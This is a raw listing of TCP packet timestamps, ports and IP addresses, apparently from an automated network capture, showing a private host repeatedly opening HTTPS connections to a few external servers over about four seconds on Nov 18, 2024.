                                            Nov 18, 2024 21:16:43.336874962 CET49814443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.336883068 CET4434981413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.337337017 CET49814443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.337342024 CET4434981413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.432887077 CET4434981313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.432976007 CET4434981313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.433047056 CET49813443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.433372974 CET49813443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.433429003 CET4434981313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.433465004 CET49813443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.433480978 CET4434981313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.437211037 CET49815443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.437257051 CET4434981513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.437345028 CET49815443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.437598944 CET49815443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.437628031 CET4434981513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.440562963 CET4434981113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.440797091 CET4434981113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.440851927 CET49811443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.440946102 CET49811443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.440958023 CET4434981113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.440989017 CET49811443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.440995932 CET4434981113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.444351912 CET49816443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.444448948 CET4434981613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.444555998 CET49816443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.444710970 CET49816443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.444752932 CET4434981613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.462534904 CET4434981013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.462548018 CET4434981213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.462836981 CET4434981013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.462845087 CET4434981213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.462908030 CET49810443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.462959051 CET49810443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.462959051 CET49812443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.462976933 CET4434981013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.462987900 CET49810443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.462995052 CET4434981013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.463469982 CET49812443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.463500023 CET4434981213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.463515043 CET49812443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.463522911 CET4434981213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.466475010 CET49817443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.466495991 CET4434981713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.466576099 CET49817443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.466718912 CET49817443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.466728926 CET4434981713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.468161106 CET49818443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.468256950 CET4434981813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.468353033 CET49818443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.468476057 CET49818443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.468513966 CET4434981813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.517849922 CET4434981413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.518037081 CET4434981413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.518111944 CET49814443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.518228054 CET49814443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.518239021 CET4434981413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.518251896 CET49814443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.518258095 CET4434981413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.521800041 CET49819443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.521820068 CET4434981913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.521898985 CET49819443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.522070885 CET49819443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.522080898 CET4434981913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.179006100 CET4434981613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.179996967 CET49816443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.180039883 CET4434981613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.180697918 CET49816443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.180711031 CET4434981613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.190483093 CET4434981513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.191055059 CET49815443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.191137075 CET4434981513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.191550970 CET49815443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.191565990 CET4434981513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.254731894 CET4434981813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.255527973 CET49818443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.255558968 CET4434981813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.256274939 CET49818443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.256289005 CET4434981813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.272983074 CET4434981713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.273493052 CET49817443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.273504972 CET4434981713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.274019957 CET49817443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.274024010 CET4434981713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.303809881 CET4434981913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.304336071 CET49819443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.304344893 CET4434981913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.304939032 CET49819443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.304944038 CET4434981913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.309242964 CET4434981613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.309487104 CET4434981613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.309593916 CET49816443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.309672117 CET49816443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.309673071 CET49816443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.309710979 CET4434981613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.309737921 CET4434981613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.313368082 CET49820443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.313457966 CET4434982013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.313584089 CET49820443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.313745022 CET49820443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.313780069 CET4434982013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.323204041 CET4434981513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.323642969 CET4434981513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.323741913 CET49815443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.323808908 CET49815443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.323808908 CET49815443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.323847055 CET4434981513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.323872089 CET4434981513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.326984882 CET49821443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.327022076 CET4434982113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.327131987 CET49821443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.327290058 CET49821443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.327307940 CET4434982113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.436538935 CET4434981813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.437957048 CET4434981813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.438047886 CET49818443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.438147068 CET49818443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.438196898 CET4434981813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.438227892 CET49818443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.438245058 CET4434981813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.438985109 CET4434981913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.439651012 CET4434981913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.439734936 CET49819443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.439806938 CET49819443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.439836025 CET4434981913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.439863920 CET49819443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.439878941 CET4434981913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.445935011 CET49822443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.445981979 CET4434982213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.446069002 CET49822443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.446254969 CET49822443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.446283102 CET49823443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.446284056 CET4434982213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.446304083 CET4434982313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.446367025 CET49823443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.446471930 CET49823443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.446485043 CET4434982313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.468795061 CET4972480192.168.2.493.184.221.240
                                            Nov 18, 2024 21:16:44.474057913 CET804972493.184.221.240192.168.2.4
                                            Nov 18, 2024 21:16:44.474117041 CET4972480192.168.2.493.184.221.240
                                            Nov 18, 2024 21:16:44.978610039 CET4434981713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.978784084 CET4434981713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.978857994 CET49817443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.979032040 CET49817443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.979043961 CET4434981713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.979053020 CET49817443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.979058027 CET4434981713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.982062101 CET49824443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.982101917 CET4434982413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:44.982182980 CET49824443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.982481003 CET49824443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:44.982496977 CET4434982413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.063256025 CET4434982113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.064106941 CET49821443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.064121962 CET4434982113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.064862013 CET49821443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.064867020 CET4434982113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.066006899 CET4434982013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.066431999 CET49820443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.066477060 CET4434982013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.066800117 CET49820443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.066813946 CET4434982013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.181240082 CET4434982313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.181917906 CET49823443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.181946039 CET4434982313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.182348013 CET49823443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.182352066 CET4434982313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.193384886 CET4434982113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.193546057 CET4434982113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.193620920 CET49821443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.193757057 CET49821443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.193772078 CET4434982113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.193783045 CET49821443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.193787098 CET4434982113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.197032928 CET49825443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.197072029 CET4434982513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.197170019 CET49825443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.197357893 CET49825443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.197371960 CET4434982513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.201260090 CET4434982013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.201423883 CET4434982013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.201488018 CET49820443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.201545000 CET49820443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.201566935 CET4434982013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.201582909 CET49820443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.201590061 CET4434982013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.201668978 CET4434982213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.202127934 CET49822443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.202137947 CET4434982213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.202533007 CET49822443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.202538967 CET4434982213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.203907013 CET49826443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.203943968 CET4434982613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.204015970 CET49826443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.204159021 CET49826443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.204174042 CET4434982613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.311981916 CET4434982313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.312053919 CET4434982313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.312238932 CET49823443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.314152002 CET49823443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.314166069 CET4434982313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.314187050 CET49823443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.314191103 CET4434982313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.318082094 CET49827443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.318109035 CET4434982713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.318196058 CET49827443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.318403006 CET49827443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.318414927 CET4434982713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.336311102 CET4434982213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.336467981 CET4434982213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.336559057 CET49822443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.336744070 CET49822443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.336774111 CET4434982213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.336800098 CET49822443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.336812973 CET4434982213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.338973045 CET49828443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.339014053 CET4434982813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.339097977 CET49828443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.339267969 CET49828443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.339282990 CET4434982813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.716320992 CET4434982413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.717010975 CET49824443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.717037916 CET4434982413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.717612982 CET49824443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.717618942 CET4434982413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.847269058 CET4434982413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.847359896 CET4434982413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.847503901 CET49824443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.847822905 CET49824443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.847846985 CET4434982413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.847858906 CET49824443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.847867012 CET4434982413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.851782084 CET49829443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.851821899 CET4434982913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.851919889 CET49829443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.852145910 CET49829443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.852157116 CET4434982913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.937498093 CET4434982513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.938458920 CET49825443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.938492060 CET4434982513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.938945055 CET49825443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.938952923 CET4434982513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.943521023 CET4434982613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.943939924 CET49826443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.943974972 CET4434982613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:45.944282055 CET49826443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:45.944291115 CET4434982613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.065357924 CET4434982513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.065521955 CET4434982513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.065635920 CET49825443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.065944910 CET49825443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.065964937 CET4434982513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.065978050 CET49825443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.065984964 CET4434982513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.067585945 CET4434982713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.069456100 CET49827443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.069466114 CET4434982713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.069591999 CET49830443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.069637060 CET4434983013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.069714069 CET49830443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.069876909 CET49830443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.069895983 CET4434983013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.069899082 CET49827443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.069904089 CET4434982713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.073121071 CET4434982613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.073472977 CET4434982613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.073537111 CET49826443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.073566914 CET49826443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.073589087 CET4434982613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.073602915 CET49826443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.073611021 CET4434982613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.076066971 CET49831443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.076086998 CET4434983113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.076170921 CET49831443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.076332092 CET49831443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.076343060 CET4434983113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.083170891 CET4434982813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.083576918 CET49828443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.083585978 CET4434982813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.083954096 CET49828443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.083959103 CET4434982813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.199095964 CET4434982713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.199804068 CET4434982713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.199928045 CET49827443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.201020002 CET49827443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.201020002 CET49827443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.201034069 CET4434982713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.201042891 CET4434982713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.202482939 CET49832443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.202524900 CET4434983213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.202619076 CET49832443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.202773094 CET49832443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.202790976 CET4434983213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.219711065 CET4434982813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.219800949 CET4434982813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.219919920 CET49828443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.219942093 CET49828443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.219957113 CET4434982813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.219965935 CET49828443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.219970942 CET4434982813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.222938061 CET49833443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.222994089 CET4434983313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.223082066 CET49833443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.223196983 CET49833443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:46.223218918 CET4434983313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:46.691704988 CET49834443192.168.2.4142.250.185.164
                                            Nov 18, 2024 21:16:46.691751003 CET44349834142.250.185.164192.168.2.4
                                            Nov 18, 2024 21:16:46.691844940 CET49834443192.168.2.4142.250.185.164
                                            Nov 18, 2024 21:16:46.692178965 CET49834443192.168.2.4142.250.185.164
                                            Nov 18, 2024 21:16:46.692188025 CET44349834142.250.185.164192.168.2.4
                                            Nov 18, 2024 21:16:47.082603931 CET4434982913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.083209038 CET49829443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.083242893 CET4434982913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.083720922 CET49829443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.083728075 CET4434982913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.250922918 CET4434983013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.251614094 CET49830443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.251647949 CET4434983013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.252269983 CET49830443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.252275944 CET4434983013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.292526007 CET4434983113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.292942047 CET49831443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.292964935 CET4434983113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.293463945 CET49831443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.293472052 CET4434983113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.507365942 CET4434982913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.507531881 CET4434982913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.507610083 CET49829443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.507832050 CET49829443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.507875919 CET4434982913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.507905960 CET49829443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.507921934 CET4434982913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.511336088 CET49835443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.511404037 CET4434983513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.511483908 CET49835443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.511658907 CET49835443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.511687040 CET4434983513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.519099951 CET4434983213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.519541979 CET49832443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.519607067 CET4434983213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.520292997 CET49832443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.520308971 CET4434983213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.645433903 CET4434983013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.645510912 CET4434983013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.645572901 CET49830443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.645900011 CET49830443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.645925999 CET4434983013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.645937920 CET49830443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.645950079 CET4434983013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.647262096 CET4434983313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:47.647928953 CET49833443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:47.647949934 CET4434983313.107.246.45192.168.2.4
